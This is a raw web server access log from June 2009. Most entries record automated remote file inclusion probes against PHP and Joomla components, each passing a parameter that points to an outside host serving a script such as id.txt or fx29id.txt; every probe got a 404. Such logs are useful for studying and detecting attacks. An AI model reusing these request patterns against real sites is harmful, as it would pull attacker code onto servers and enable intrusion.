99.150.247.52 - - [20/Jun/2009:00:00:13 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L309BB14280A292006D6F044+M37+ENG HTTP/1.1" 200 38024 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):16946_________________________" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
99.150.247.52 - - [20/Jun/2009:00:00:15 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
211.49.99.7 - - [20/Jun/2009:00:01:22 -0400] "GET /init.php?API_HOME_DIR=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
211.49.99.7 - - [20/Jun/2009:00:01:22 -0400] "GET /logs/init.php?API_HOME_DIR=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.49.99.7 - - [20/Jun/2009:00:01:24 -0400] "GET /logs/access_log.Q109060200/init.php?API_HOME_DIR=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.49.99.7 - - [20/Jun/2009:00:01:31 -0400] "GET /logs/error_log.Q109060200/init.php?API_HOME_DIR=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.49.99.7 - - [20/Jun/2009:00:01:31 -0400] "GET /logs/access_log.Q109060200/init.php?API_HOME_DIR=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.49.99.7 - - [20/Jun/2009:00:01:31 -0400] "GET /init.php?API_HOME_DIR=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
211.49.99.7 - - [20/Jun/2009:00:01:35 -0400] "GET /logs/access_log.Q109010700/init.php?API_HOME_DIR=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.49.99.7 - - [20/Jun/2009:00:01:35 -0400] "GET /logs/init.php?API_HOME_DIR=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
75.125.245.26 - - [20/Jun/2009:00:01:50 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
75.125.245.26 - - [20/Jun/2009:00:01:50 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
75.125.245.26 - - [20/Jun/2009:00:01:50 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.49.99.7 - - [20/Jun/2009:00:02:00 -0400] "GET /init.php?API_HOME_DIR=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
211.49.99.7 - - [20/Jun/2009:00:02:00 -0400] "GET /logs/init.php?API_HOME_DIR=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.49.99.7 - - [20/Jun/2009:00:02:00 -0400] "GET /logs/access_log.Q109060200%20%20/init.php?API_HOME_DIR=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.49.99.7 - - [20/Jun/2009:00:02:16 -0400] "GET /logs/access_log.Q109010700%20%20/init.php?API_HOME_DIR=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.149.226.223 - - [20/Jun/2009:00:02:21 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
62.149.226.223 - - [20/Jun/2009:00:02:21 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
62.149.226.223 - - [20/Jun/2009:00:02:21 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:02:42 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:02:42 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:02:42 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:02:43 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:03:02 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:03:02 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jun/2009:00:03:03 -0400] "GET //errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jun/2009:00:03:03 -0400] "GET /logs//errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jun/2009:00:03:03 -0400] "GET /logs/access_log.Q109052000//errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [20/Jun/2009:00:03:18 -0400] "GET /logs/access_log.Q109052400/components/com_simpleboard/image_upload.php?sbp=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
190.144.44.36 - - [20/Jun/2009:00:03:18 -0400] "GET /components/com_simpleboard/image_upload.php?sbp=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
190.144.44.36 - - [20/Jun/2009:00:03:18 -0400] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jun/2009:00:03:21 -0400] "GET /logs/access_log.Q109060400//errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
124.138.156.3 - - [20/Jun/2009:00:03:49 -0400] "GET /logs//errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
124.138.156.3 - - [20/Jun/2009:00:03:49 -0400] "GET /logs/access_log.Q109052000//errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
124.138.156.3 - - [20/Jun/2009:00:03:53 -0400] "GET //errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:03:59 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:03:59 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:04:01 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
75.125.245.26 - - [20/Jun/2009:00:04:04 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:04:04 -0400] "GET /logs/access_log.Q109052900%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:04:07 -0400] "GET /logs/access_log.Q109052900%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:00:04:10 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:00:04:10 -0400] "GET /logs/access_log.Q109060400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:00:04:10 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:04:11 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
124.138.156.3 - - [20/Jun/2009:00:04:20 -0400] "GET /logs/access_log.Q109060400//errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:04:23 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:04:28 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:04:29 -0400] "GET /logs/access_log.Q109052900%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:00:04:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.8.66.19 - - [20/Jun/2009:00:05:06 -0400] "GET /logs/access_log.Q109052900%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:00:05:14 -0400] "GET /init.php?API_HOME_DIR=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:00:05:14 -0400] "GET /logs/init.php?API_HOME_DIR=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:00:05:14 -0400] "GET /logs/access_log.Q109060200/init.php?API_HOME_DIR=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:05:18 -0400] "GET /logs/access_log.Q109052900%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:00:05:23 -0400] "GET /logs/access_log.Q109052900%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:00:05:24 -0400] "GET /logs/access_log.Q109051500%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:00:05:38 -0400] "GET /logs/access_log.Q109051500%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:00:05:38 -0400] "GET /logs/access_log.Q109010700/init.php?API_HOME_DIR=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:00:05:42 -0400] "GET /logs/access_log.Q109061200/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
195.34.78.110 - - [20/Jun/2009:00:05:43 -0400] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
195.34.78.110 - - [20/Jun/2009:00:05:43 -0400] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
190.144.44.36 - - [20/Jun/2009:00:05:46 -0400] "GET /logs/access_log.Q109052500/components/com_simpleboard/image_upload.php?sbp=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:05:53 -0400] "GET /logs/access_log.Q109052900%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:00:06:04 -0400] "GET /logs/init.php?API_HOME_DIR=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:00:06:04 -0400] "GET /init.php?API_HOME_DIR=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:00:06:04 -0400] "GET /logs/access_log.Q109060200%20%20/init.php?API_HOME_DIR=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:00:06:04 -0400] "GET /logs/access_log.Q109010700%20%20/init.php?API_HOME_DIR=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [20/Jun/2009:00:06:11 -0400] "GET /logs/access_log.Q109060100//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [20/Jun/2009:00:06:11 -0400] "GET /logs/access_log.Q109053100//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:06:12 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
88.191.89.138 - - [20/Jun/2009:00:06:13 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.inboxstorage.nl/images/yes.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.813"
88.191.89.138 - - [20/Jun/2009:00:06:13 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.inboxstorage.nl/images/yes.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.813"
88.191.89.138 - - [20/Jun/2009:00:06:13 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.inboxstorage.nl/images/yes.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.813"
88.191.89.138 - - [20/Jun/2009:00:06:13 -0400] "GET /logs/error_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.inboxstorage.nl/images/yes.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.813"
83.98.209.71 - - [20/Jun/2009:00:06:14 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:00:06:14 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:00:06:14 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.172.33.230 - - [20/Jun/2009:00:06:23 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 274 "-" "libwww-perl/5.812"
209.172.33.230 - - [20/Jun/2009:00:06:23 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.812"
209.172.33.230 - - [20/Jun/2009:00:06:23 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 252 "-" "libwww-perl/5.812"
209.172.33.230 - - [20/Jun/2009:00:06:23 -0400] "GET /logs/error_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 273 "-" "libwww-perl/5.812"
87.230.22.39 - - [20/Jun/2009:00:06:25 -0400] "GET /logs/access_log.Q109060400%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:06:30 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:00:06:31 -0400] "GET /logs/access_log.Q109051600/inc/functions.inc.php?config[ppa_root_path]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:00:06:48 -0400] "GET /logs/access_log.Q109052500/inc/functions.inc.php?config[ppa_root_path]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jun/2009:00:06:53 -0400] "GET /logs/access_log.Q109052000%20%20//errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
124.138.156.3 - - [20/Jun/2009:00:06:56 -0400] "GET /inc/functions.inc.php?config[ppa_root_path]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
124.138.156.3 - - [20/Jun/2009:00:06:56 -0400] "GET /logs/inc/functions.inc.php?config[ppa_root_path]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
124.138.156.3 - - [20/Jun/2009:00:06:56 -0400] "GET /logs/access_log.Q109051600/inc/functions.inc.php?config[ppa_root_path]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jun/2009:00:07:00 -0400] "GET /logs/access_log.Q109060400%20%20//errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:00:07:06 -0400] "GET /logs//errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:00:07:06 -0400] "GET /logs/access_log.Q109061300%20%20//errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:00:07:06 -0400] "GET //errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:00:07:11 -0400] "GET /logs//errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:00:07:11 -0400] "GET /logs/access_log.Q109061300%20%20//errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:00:07:12 -0400] "GET //errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:00:07:24 -0400] "GET /logs/error_log.Q109061300%20%20//errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:00:07:26 -0400] "GET /logs/error_log.Q109061300%20%20//errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.149.226.223 - - [20/Jun/2009:00:07:34 -0400] "GET /logs/access_log.Q109060300%20%20//include/mail.inc.php?skin_board_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
124.138.156.3 - - [20/Jun/2009:00:07:39 -0400] "GET /logs/access_log.Q109052500/inc/functions.inc.php?config[ppa_root_path]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:07:55 -0400] "GET /logs/access_log.Q109051700/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:07:59 -0400] "GET /logs/access_log.Q109052900/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:00:08:12 -0400] "GET /logs/access_log.Q109051600/inc/functions.inc.php?config[ppa_root_path]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:08:16 -0400] "GET /logs/access_log.Q109051700/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:08:16 -0400] "GET /logs/access_log.Q109052900/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:00:08:18 -0400] "GET /logs//errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:00:08:18 -0400] "GET /logs/access_log.Q109061300%20%20//errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:00:08:18 -0400] "GET //errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:08:20 -0400] "GET /logs/access_log.Q109051700/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:00:08:24 -0400] "GET /logs/access_log.Q109052900/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:00:08:28 -0400] "GET /logs/access_log.Q109052500/inc/functions.inc.php?config[ppa_root_path]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
88.191.89.138 - - [20/Jun/2009:00:08:29 -0400] "GET /logs/error_log.Q109053100%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.inboxstorage.nl/images/yes.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.813"
66.11.230.36 - - [20/Jun/2009:00:08:31 -0400] "GET /logs/error_log.Q109061300%20%20//errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:00:09:03 -0400] "GET /logs/init.php?API_HOME_DIR=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:00:09:03 -0400] "GET /init.php?API_HOME_DIR=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:00:09:03 -0400] "GET /logs/access_log.Q109010700%20%20/init.php?API_HOME_DIR=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:00:09:06 -0400] "GET /logs/access_log.Q109060200%20%20/init.php?API_HOME_DIR=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:00:09:13 -0400] "GET /logs/access_log.Q109061300//errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.172.33.230 - - [20/Jun/2009:00:09:14 -0400] "GET /logs/error_log.Q109053100%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 274 "-" "libwww-perl/5.812"
174.142.68.168 - - [20/Jun/2009:00:09:14 -0400] "GET /logs/access_log.Q109052200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://free.7host05.com/tachatte69/id.txt???? HTTP/1.1" 404 266 "-" "libwww-perl/5.826"
174.142.68.168 - - [20/Jun/2009:00:09:14 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://free.7host05.com/tachatte69/id.txt???? HTTP/1.1" 404 239 "-" "libwww-perl/5.826"
